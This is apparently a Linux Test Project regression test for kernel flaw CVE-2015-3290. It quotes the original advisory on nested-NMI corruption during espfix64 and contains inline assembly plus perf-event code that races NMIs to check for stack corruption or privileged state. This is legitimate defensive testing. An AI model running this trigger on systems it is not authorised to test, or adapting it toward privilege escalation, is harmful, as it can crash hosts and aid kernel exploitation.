// SPDX-License-Identifier: GPL-2.0-or-later
/*
 * Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com>
 */

/*

NOTE: rather than checking for full nested NMI exploitation we simply check
that the NMI stack state can be corrupted with this code.

http://www.openwall.com/lists/oss-security/2015/08/04/8

> +++++ CVE-2015-3290 +++++
>
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed by:
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
>
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
>
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
> perf_event_open using seccomp. A fully-functional, portable, reliable
> exploit is privately available and will be published in a week or two.
> *Patch your systems*

And here's a real advisory:

If an NMI returns via espfix64 and is interrupted during espfix64 setup
by another NMI, the return state is corrupt. This is exploitable for
reliable privilege escalation on any Linux x86_64 system in which
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
nested.

Glossing over a lot of details, the basic structure of Linux' nested NMI
handling is:

nmi_handler:
   if (in_nmi) {
      nmi_latched = true;
      return;
   }
   in_nmi = true;
   handle the nmi;
   atomically (this is magic):
      if (nmi_latched) {
         nmi_latched = false;
         start over;
      } else {
         in_nmi = false;
         return and unmask NMIs;
      }

Alas, on x86_64, there is no reasonable way to block NMIs to run the
atomic part of that pseudocode atomically. Instead, the entire atomic
piece is implemented by the single instruction IRET.

But x86_64 is more broken than just that. The IRET instruction does not
restore register state correctly [1] when returning to a 16-bit stack
segment. x86_64 has a complicated workaround called espfix64. If
espfix64 is invoked on return, a well-behaved IRET is emulated by a
complicated scheme that involves manually switching stacks. During the
stack switch, there is a window of approximately 19 instructions between
the start of espfix64's access to the original stack and when espfix64
is done with the original stack. If a nested NMI occurs during this
window, then the atomic part of the basic nested NMI algorithm is
observably non-atomic.

Depending on exactly where in this window the nested NMI hits, the
results vary. Most nested NMIs will corrupt the return context and
crash the calling process. Some are harmless except that the nested NMI
gets ignored. There is a two-instruction window in which the return
context ends up with user-controlled RIP and CS set to __KERNEL_CS.

A careful exploit (attached) can recover from all the crashy failures
and can regenerate a valid *privileged* state if a nested NMI occurs
during the two-instruction window. This exploit appears to work
reasonably quickly across a fairly wide range of Linux versions.

If you have SMEP, this exploit is likely to panic the system. Writing
a usable exploit against a SMEP system would be considerably more
challenging, but it's surely possible.

Measures like UDEREF are unlikely to help, because this bug is outside
any region that can be protected using paging or segmentation tricks.
However, recent grsecurity kernels seem to forcibly disable espfix64, so
they're not vulnerable in the first place.

A couple of notes:

 - This exploit's payload just prints the text "CPL0". The exploit
   will keep going after printing CPL0 so you can enjoy seeing the
   frequency with which it wins. Interested parties could easily
   write different payloads. I doubt that any existing exploit
   mitigation techniques would be useful against this type of
   attack.

 - If you are using a kernel older than v4.1, a 64-bit build of the
   exploit will trigger a signal handling bug and crash. Defenders
   should not rejoice, because the exploit works fine when built
   as a 32-bit binary or (so I'm told) as an x32 binary.

 - This is the first exploit I've ever written that contains genuine
   hexadecimal code. The more assembly-minded among you can have
   fun figuring out why :)

[1] By "correctly", I mean that the register state ends up different
from that which was saved in the stack frame, not that the
implementation doesn't match the spec in the microcode author's minds.
The spec is simply broken (differently on AMD and Intel hardware,
perhaps unsurprisingly.)

--Andy
*/

#include "config.h"
#include "tst_test.h"
#include "tst_timer.h"

#if HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__))

#include <stdlib.h>
#include <stdio.h>
#include <inttypes.h>
#include <asm/ldt.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <linux/perf_event.h>

#include "lapi/syscalls.h"
#include "tst_safe_pthread.h"

/* Abstractions for some 32-bit vs 64-bit differences. */
#ifdef __x86_64__
# define REG_IP REG_RIP
# define REG_SP REG_RSP
# define REG_AX REG_RAX

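/*
 * The x86_64 signal context packs cs, gs, fs and (on kernels that save it)
 * ss as four consecutive 16-bit fields in the single REG_CSGSFS greg; this
 * overlay gives the helpers below named access to CS and SS.
 */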
struct selectors {
	unsigned short cs, gs, fs, ss;
};

LTP_ATTRIBUTE_UNUSED
static unsigned short *ssptr(ucontext_t *ctx)
{
	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
	return &sels->ss;
}

LTP_ATTRIBUTE_UNUSED
static unsigned short *csptr(ucontext_t *ctx)
{
	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
	return &sels->cs;
}
#else
# define REG_IP REG_EIP
# define REG_SP REG_ESP
# define REG_AX REG_EAX
# define REG_CR2 (REG_SS + 3)

LTP_ATTRIBUTE_UNUSED
static greg_t *ssptr(ucontext_t *ctx)
{
	return &ctx->uc_mcontext.gregs[REG_SS];
}

LTP_ATTRIBUTE_UNUSED
static greg_t *csptr(ucontext_t *ctx)
{
	return &ctx->uc_mcontext.gregs[REG_CS];
}
#endif

static volatile long expected_rsp;
static int running = 1;

static void set_ldt(void)
{
	/* Boring 16-bit data segment. */
	const struct user_desc data_desc = {
		.entry_number = 0,
		.base_addr = 0,
		.limit = 0xfffff,
		.seg_32bit = 0,
		.contents = 0, /* Data, expand-up */
		.read_exec_only = 0,
		.limit_in_pages = 0,
		.seg_not_present = 0,
		.useable = 0
	};

	TEST(tst_syscall(__NR_modify_ldt, 1, &data_desc, sizeof(data_desc)));
	if (TST_RET == -EINVAL) {
		tst_brk(TCONF | TRERRNO,
			"modify_ldt: 16-bit data segments are probably disabled");
	} else if (TST_RET != 0) {
		tst_brk(TBROK | TRERRNO, "modify_ldt");
	}
}

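/*
 * Load SS with selector 0x7 (LDT entry 0, TI=1, RPL=3, i.e. the 16-bit data
 * segment installed by set_ldt()) so that returns to user mode take the
 * espfix path, then spin so a perf NMI can land inside the espfix window.
 * Afterwards check whether we unexpectedly reached CPL0, and whether SS and
 * the interrupt flag survived; int3 flags an inconsistent state.
 */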
static void try_corrupt_stack(unsigned short orig_ss)
{
#ifdef __x86_64__
	asm volatile (
		/* A small puzzle for the curious reader. */
		"mov $2048, %%rbp \n\t"

		/* Save rsp for diagnostics */
		"mov %%rsp, %[expected_rsp] \n\t"

		/*
		 * Let 'er rip.
		 */
		"mov %[ss], %%ss \n\t" /* begin corruption */
		"movl $1000, %%edx \n\t"
		"1: decl %%edx \n\t"
		"jnz 1b \n\t"
		"mov %%ss, %%eax \n\t" /* grab SS to display */

		/* Did we enter CPL0? */
		"mov %%cs, %%dx \n\t"
		"testw $3, %%dx \n\t"
		"jnz 2f \n\t"
		"leaq 3f(%%rip), %%rcx \n\t"
		"movl $0x200, %%r11d \n\t"
		"sysretq \n\t"
		"2: \n\t"

		/*
		 * Stop further corruption. We need to check CPL
		 * first because we need RPL == CPL.
		 */
		"mov %[orig_ss], %%ss \n\t" /* end corruption */

		"subq $128, %%rsp \n\t"
		"pushfq \n\t"
		"testl $(1<<9),(%%rsp) \n\t"
		"addq $136, %%rsp \n\t"
		"jz 3f \n\t"
		"cmpl %[ss], %%eax \n\t"
		"je 4f \n\t"
		"3: int3 \n\t"
		"4: \n\t"
		: [expected_rsp] "=m" (expected_rsp)
		: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
		: "rax", "rcx", "rdx", "rbp", "r11", "flags"
	);
#else
	asm volatile (
		/* A small puzzle for the curious reader. */
		"mov %%ebp, %%esi \n\t"
		"mov $2048, %%ebp \n\t"

		/* Save rsp for diagnostics */
		"mov %%esp, %[expected_rsp] \n\t"

		/*
		 * Let 'er rip.
		 */
		"mov %[ss], %%ss \n\t" /* begin corruption */
		"movl $1000, %%edx \n\t"
		"1: .byte 0xff, 0xca \n\t" /* decl %edx */
		"jnz 1b \n\t"
		"mov %%ss, %%eax \n\t" /* grab SS to display */

		/* Did we enter CPL0? */
		"mov %%cs, %%dx \n\t"
		"testw $3, %%dx \n\t"
		"jnz 2f \n\t"
		".code64 \n\t"
		"leaq 3f(%%rip), %%rcx \n\t"
		"movl $0x200, %%r11d \n\t"
		"sysretl \n\t"
		".code32 \n\t"
		"2: \n\t"

		/*
		 * Stop further corruption. We need to check CPL
		 * first because we need RPL == CPL.
		 */
		"mov %[orig_ss], %%ss \n\t" /* end corruption */

		"pushf \n\t"
		"testl $(1<<9),(%%esp) \n\t"
		"addl $4, %%esp \n\t"
		"jz 3f \n\t"
		"cmpl %[ss], %%eax \n\t"
		"je 4f \n\t"
		"4: mov %%esi, %%ebp \n\t"
		"3: int3 \n\t"
		: [expected_rsp] "=m" (expected_rsp)
		: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
		: "eax", "ecx", "edx", "esi", "flags"
	);
#endif
}

static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
			   int cpu, int group_fd, unsigned long flags)
{
	int ret;

	ret = tst_syscall(__NR_perf_event_open, hw_event, pid, cpu,
			  group_fd, flags);
	return ret;
}

static int event_mlock_kb;
static int max_sample_rate;

static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED)
{
	long niter = 0;
	unsigned short orig_ss;

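	/*
	 * Sampling hardware perf events deliver their PMU overflow
	 * interrupts as NMIs on x86, so a high sample frequency provides a
	 * steady stream of NMIs to race against the espfix return path
	 * exercised by try_corrupt_stack().
	 */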
	struct perf_event_attr pe = {
		.size = sizeof(struct perf_event_attr),
		.disabled = 0,
		.exclude_kernel = 0,
		.exclude_hv = 0,
		.freq = 1,
		.sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
			PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
			PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
	};
	/* Workaround bug in GCC 4.4.7 (CentOS6) */
	pe.sample_freq = max_sample_rate / 5;

	struct {
		uint32_t type;
		uint64_t config;
		const char *name;
	} perf_events[] = {
		{
			.type = PERF_TYPE_HARDWARE,
			.config = PERF_COUNT_HW_INSTRUCTIONS,
			.name = "hw instructions",
		},
		{
			.type = PERF_TYPE_HARDWARE,
			.config = PERF_COUNT_HW_CACHE_REFERENCES,
			.name = "hw cache references",
		},
	};

	void *perf_mmaps[ARRAY_SIZE(perf_events)];
	unsigned int i;

	for (i = 0; i < ARRAY_SIZE(perf_events); i++) {
		int fd;

		pe.type = perf_events[i].type;
		pe.config = perf_events[i].config;

		fd = perf_event_open(&pe, 0, -1, -1, 0);
		if (fd == -1) {
			if (errno == EINVAL || errno == ENOENT ||
			    errno == EBUSY)
				tst_brk(TCONF | TERRNO,
					"no hardware counters");
			else
				tst_brk(TBROK | TERRNO, "perf_event_open");
			/* tst_brk exits */
		}

		perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024,
					  PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
		SAFE_CLOSE(fd);
	}

	asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));

	for (niter = 0; running && niter < 1000*1000*1000L; niter++) {

		try_corrupt_stack(orig_ss);

		/*
		 * If we ended up with IF == 0, there's no easy way to fix
		 * it. Instead, make frequent syscalls to avoid hanging
		 * the system.
		 */
		syscall(0x3fffffff);
	}

	for (i = 0; i < ARRAY_SIZE(perf_events); i++)
		if (perf_mmaps[i] != MAP_FAILED)
			SAFE_MUNMAP(perf_mmaps[i], event_mlock_kb * 1024);

	return (void *)niter;
}

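/*
 * Worker threads hammer the race for TIME_TO_GIVEUP seconds; the margin
 * below the overall test timeout leaves room to stop them, join and report.
 */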
#define TIMEOUT (180)
#define TIME_TO_GIVEUP (TIMEOUT - 5)
#define TIMER_TYPE CLOCK_MONOTONIC

static void do_child(void)
{
	int i, ncpus;
	pthread_t *threads;
	long iter, total_iter = 0;

	tst_res(TINFO, "attempting to corrupt nested NMI stack state");

	set_ldt();

	ncpus = tst_ncpus();
	threads = SAFE_MALLOC(sizeof(*threads) * ncpus);

	for (i = 0; i < ncpus; i++)
		SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL);

	sleep(TIME_TO_GIVEUP);
	running = 0;

	for (i = 0; i < ncpus; i++) {
		SAFE_PTHREAD_JOIN(threads[i], (void **)&iter);
		total_iter += iter;
	}
	free(threads);

	tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations",
		total_iter);
}

static void setup(void)
{
	/*
	 * According to perf_event_open's manpage, the official way of
	 * knowing if perf_event_open() support is enabled is checking for
	 * the existence of the file /proc/sys/kernel/perf_event_paranoid.
	 */
	if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
		tst_brk(TCONF, "Kernel doesn't have perf_event support");

	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
			"%d", &event_mlock_kb);
	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
			"%d", &max_sample_rate);
}

static void run(void)
{
	pid_t pid;
	int status;

	pid = SAFE_FORK();
	if (pid == 0) {
		do_child();
		return;
	}

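	/*
	 * A corrupted NMI return frame typically kills the child with
	 * SIGSEGV (see the note at the top of this file), which we report
	 * as a failure.
	 */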
	SAFE_WAITPID(pid, &status, 0);
	if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV)
		tst_res(TFAIL, "corrupted NMI stack");
	else if (WIFEXITED(status) && WEXITSTATUS(status) != 0)
		tst_res(WEXITSTATUS(status), "Propagate child status");
}

static struct tst_test test = {
	.forks_child = 1,
	.needs_root = 1,
	.needs_checkpoints = 1,
	.setup = setup,
	.timeout = TIMEOUT,
	.test_all = run,
	.tags = (const struct tst_tag[]) {
		{"linux-git", "9b6e6a8334d5"},
		{"CVE", "2015-3290"},
		{}
	}
};

#else /* HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__)) */

TST_TEST_TCONF("no perf_event_attr or not (i386 or x86_64)");

#endif